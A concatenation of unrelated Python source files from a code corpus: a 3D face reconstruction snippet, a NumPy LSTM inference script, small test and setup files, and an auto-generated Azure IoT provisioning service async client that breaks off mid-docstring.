input_img,lm_new,transform_params = align_img(img,lm,lm3D)
coeff_,face_shape_,face_texture_,face_color_,landmarks_2d_,recon_img_,tri_ = sess.run([coeff,\
face_shape,face_texture,face_color,landmarks_2d,recon_img,tri],feed_dict = {images: input_img})
# reshape outputs
input_img = np.squeeze(input_img)
face_shape_ = np.squeeze(face_shape_, (0))
face_texture_ = np.squeeze(face_texture_, (0))
face_color_ = np.squeeze(face_color_, (0))
landmarks_2d_ = np.squeeze(landmarks_2d_, (0))
if not is_windows:
recon_img_ = np.squeeze(recon_img_, (0))
# save output files
# if not is_windows:
# savemat(os.path.join(save_path,file.split(os.path.sep)[-1].replace('.png','.mat').replace('jpg','mat')),{'cropped_img':input_img[:,:,::-1],'recon_img':recon_img_,'coeff':coeff_,\
# 'face_shape':face_shape_,'face_texture':face_texture_,'face_color':face_color_,'lm_68p':landmarks_2d_,'lm_5p':lm_new})
save_obj(file.replace('.JPG','_mesh.obj'),face_shape_,tri_,np.clip(face_color_,0,255)/255) # 3D reconstruction face (in canonical view)
if __name__ == '__main__':
demo()
| StarcoderdataPython |
3378945 | from __future__ import print_function
import numpy as np
import time
import data_util
weight_names = ["w_in", "b_in", "w_out", "b_out",
"rnn/multi_rnn_cell/cell_0/basic_lstm_cell/weights",
"rnn/multi_rnn_cell/cell_0/basic_lstm_cell/biases",
"rnn/multi_rnn_cell/cell_1/basic_lstm_cell/weights",
"rnn/multi_rnn_cell/cell_1/basic_lstm_cell/biases"]
"""
w_in 9,32
b_in 32
rnn/multi_rnn_cell/cell_0/basic_lstm_cell/weights 64,128
rnn/multi_rnn_cell/cell_0/basic_lstm_cell/biases 128
rnn/multi_rnn_cell/cell_1/basic_lstm_cell/weights 64,128
rnn/multi_rnn_cell/cell_1/basic_lstm_cell/biases 128
w_out 32,6
b_out 6
"""
weights = {}
for name in weight_names:
var_file_name = "data/{}.csv".format(name.replace("/", "_"))
weights[name] = np.loadtxt(var_file_name, delimiter=",")
# print("{}: {}".format(name, weights[name]))
def sigmoid(x_): return 1 / (1 + np.exp(-x_))
def calc_cell_one_step(in_, c_, h_, l):
# print("h:\n{}".format(h))
# print("x_step:\n{}".format(x_step))
concat = np.concatenate([in_, h_], 1) \
.dot(weights["rnn/multi_rnn_cell/cell_{}/basic_lstm_cell/weights".format(l)]) \
+ weights["rnn/multi_rnn_cell/cell_{}/basic_lstm_cell/biases".format(l)]
# print("concat:{}".format(concat.shape))
i, j, f, o = np.split(concat, 4, axis=1)
# print("i:{}, j:{}, f:{}, o:{}".format(i.shape, j.shape, f.shape, o.shape))
new_c = (c_ * sigmoid(f + 1) + sigmoid(i) * np.tanh(j))
new_h = np.tanh(new_c) * sigmoid(o)
return new_c, new_h
def predict(x_):
inputs = np.maximum(np.dot(x_, weights["w_in"]) + weights["b_in"], 0)
# np.savetxt("data/inputs_np.log", inputs, '%.8e')
hidden_unit = len(weights["b_in"])
inputs = np.split(inputs, time_steps, 0)
outputs = []
for layer in range(layer_size):
c = np.zeros((1, hidden_unit))
h = np.zeros((1, hidden_unit))
for step in range(time_steps):
input_ = inputs[step]
c, h = calc_cell_one_step(input_, c, h, layer)
inputs[step] = h
outputs.append(h)
out_prob = np.dot(outputs[-1], weights["w_out"]) + weights["b_out"]
# print("out_prob: {}".format(out_prob))
with open("data/label_prob_np.log", "a") as f:
np.savetxt(f, out_prob, '%.8e')
return np.argmax(out_prob) + 1
# np.savetxt("data/labels_np.log", labels_predicted, fmt="%d")
if __name__ == "__main__":
start_time = time.time()
x_test, y_test = data_util.get_data("test")
time_steps = len(x_test[0])
input_dim = len(x_test[0][0])
layer_size = 2
sample_size = 100
p_start = time.time()
labels_predicted = [predict(x_test[i]) for i in range(sample_size)]
p_end = time.time()
print("prediction time: {}s".format(p_end - p_start))
labels = np.argmax(y_test, 1) + 1
print("label:\n{}\nY:\n{}".format(np.asarray(labels_predicted), labels))
print("accuracy: {}".format(np.sum(labels[np.arange(sample_size)] == np.asarray(labels_predicted))
* 1.0 * 100 / sample_size))
np.savetxt("data/labels_np.log", labels_predicted, fmt="%d")
print("Finished, takes {:6.4f} s".format(time.time() - start_time))
| StarcoderdataPython |
1714399 | # noqa
x = # Cause import error
| StarcoderdataPython |
26854 | <reponame>DarkSession/fd-api
# vim: textwidth=0 wrapmargin=0 tabstop=2 shiftwidth=2 softtabstop=2 smartindent smarttab
from setuptools import setup, find_namespace_packages
setup(
name="org.miggy",
packages=find_namespace_packages()
)
| StarcoderdataPython |
162569 | <filename>testing/test_homework_01/conftest.py
# from utils import add_homework_path
#
# add_homework_path(__file__)
| StarcoderdataPython |
194645 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._iot_dps_resource_operations import build_check_provisioning_service_name_availability_request, build_create_or_update_private_endpoint_connection_request_initial, build_create_or_update_request_initial, build_delete_private_endpoint_connection_request_initial, build_delete_request_initial, build_get_operation_result_request, build_get_private_endpoint_connection_request, build_get_private_link_resources_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_list_keys_for_key_name_request, build_list_keys_request, build_list_private_endpoint_connections_request, build_list_private_link_resources_request, build_list_valid_skus_request, build_update_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class IotDpsResourceOperations:
"""IotDpsResourceOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.iothubprovisioningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
"""Get the non-security related metadata of the provisioning service.
Get the metadata of the provisioning service without SAS keys.
:param provisioning_service_name: Name of the provisioning service to retrieve.
:type provisioning_service_name: str
:param resource_group_name: Resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProvisioningServiceDescription, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
provisioning_service_name: str,
iot_dps_description: "_models.ProvisioningServiceDescription",
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(iot_dps_description, 'ProvisioningServiceDescription')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
provisioning_service_name: str,
iot_dps_description: "_models.ProvisioningServiceDescription",
**kwargs: Any
) -> AsyncLROPoller["_models.ProvisioningServiceDescription"]:
"""Create or update the metadata of the provisioning service.
Create or update the metadata of the provisioning service. The usual pattern to modify a
property is to retrieve the provisioning service metadata and security metadata, and then
combine them with the modified values in a new body to update the provisioning service.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to create or update.
:type provisioning_service_name: str
:param iot_dps_description: Description of the provisioning service to create or update.
:type iot_dps_description:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ProvisioningServiceDescription or
the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
iot_dps_description=iot_dps_description,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
async def _update_initial(
self,
resource_group_name: str,
provisioning_service_name: str,
provisioning_service_tags: "_models.TagsResource",
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(provisioning_service_tags, 'TagsResource')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
provisioning_service_name: str,
provisioning_service_tags: "_models.TagsResource",
**kwargs: Any
) -> AsyncLROPoller["_models.ProvisioningServiceDescription"]:
"""Update an existing provisioning service's tags.
Update an existing provisioning service's tags. to update other fields use the CreateOrUpdate
method.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to create or update.
:type provisioning_service_name: str
:param provisioning_service_tags: Updated tag information to set into the provisioning service
instance.
:type provisioning_service_tags: ~azure.mgmt.iothubprovisioningservices.models.TagsResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ProvisioningServiceDescription or
the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
provisioning_service_tags=provisioning_service_tags,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
async def _delete_initial(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Delete the Provisioning Service.
Deletes the Provisioning Service.
:param provisioning_service_name: Name of provisioning service to delete.
:type provisioning_service_name: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
provisioning_service_name=provisioning_service_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.ProvisioningServiceDescriptionListResult"]:
"""Get all the provisioning services in a subscription.
List all the provisioning services for a given subscription id.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProvisioningServiceDescriptionListResult or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=self.list_by_subscription.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProvisioningServiceDescriptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/provisioningServices'} # type: ignore
@distributed_trace
def list_by_resource_group(
self,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.ProvisioningServiceDescriptionListResult"]:
"""Get a list of all provisioning services in the given resource group.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProvisioningServiceDescriptionListResult or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_by_resource_group.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_by_resource_group_request(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("ProvisioningServiceDescriptionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices'} # type: ignore
@distributed_trace_async
async def get_operation_result(
self,
operation_id: str,
resource_group_name: str,
provisioning_service_name: str,
asyncinfo: str = "true",
**kwargs: Any
) -> "_models.AsyncOperationResult":
"""Gets the status of a long running operation, such as create, update or delete a provisioning
service.
:param operation_id: Operation id corresponding to long running operation. Use this to poll for
the status.
:type operation_id: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service that the operation is running
on.
:type provisioning_service_name: str
:param asyncinfo: Async header used to poll on the status of the operation, obtained while
creating the long running operation.
:type asyncinfo: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: AsyncOperationResult, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.AsyncOperationResult
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.AsyncOperationResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_operation_result_request(
operation_id=operation_id,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
asyncinfo=asyncinfo,
template_url=self.get_operation_result.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('AsyncOperationResult', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_operation_result.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/operationresults/{operationId}'} # type: ignore
@distributed_trace
def list_valid_skus(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.IotDpsSkuDefinitionListResult"]:
"""Get the list of valid SKUs for a provisioning service.
Gets the list of valid SKUs and tiers for a provisioning service.
:param provisioning_service_name: Name of provisioning service.
:type provisioning_service_name: str
:param resource_group_name: Name of resource group.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either IotDpsSkuDefinitionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.IotDpsSkuDefinitionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.IotDpsSkuDefinitionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_valid_skus_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.list_valid_skus.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_valid_skus_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("IotDpsSkuDefinitionListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_valid_skus.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}/skus'} # type: ignore
@distributed_trace_async
async def check_provisioning_service_name_availability(
self,
arguments: "_models.OperationInputs",
**kwargs: Any
) -> "_models.NameAvailabilityInfo":
"""Check if a provisioning service name is available.
Check if a provisioning service name is available. This will validate if the name is
syntactically valid and if the name is usable.
:param arguments: Set the name parameter in the OperationInputs structure to the name of the
provisioning service to check.
:type arguments: ~azure.mgmt.iothubprovisioningservices.models.OperationInputs
:keyword callable cls: A custom type or function that will be passed the direct response
:return: NameAvailabilityInfo, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.NameAvailabilityInfo
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.NameAvailabilityInfo"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(arguments, 'OperationInputs')
request = build_check_provisioning_service_name_availability_request(
subscription_id=self._config.subscription_id,
content_type=content_type,
json=_json,
template_url=self.check_provisioning_service_name_availability.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('NameAvailabilityInfo', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
check_provisioning_service_name_availability.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Devices/checkProvisioningServiceNameAvailability'} # type: ignore
@distributed_trace
def list_keys(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncIterable["_models.SharedAccessSignatureAuthorizationRuleListResult"]:
"""Get the security metadata for a provisioning service.
List the primary and secondary keys for a provisioning service.
:param provisioning_service_name: The provisioning service name to get the shared access keys
for.
:type provisioning_service_name: str
:param resource_group_name: resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SharedAccessSignatureAuthorizationRuleListResult
or the result of cls(response)
:rtype:
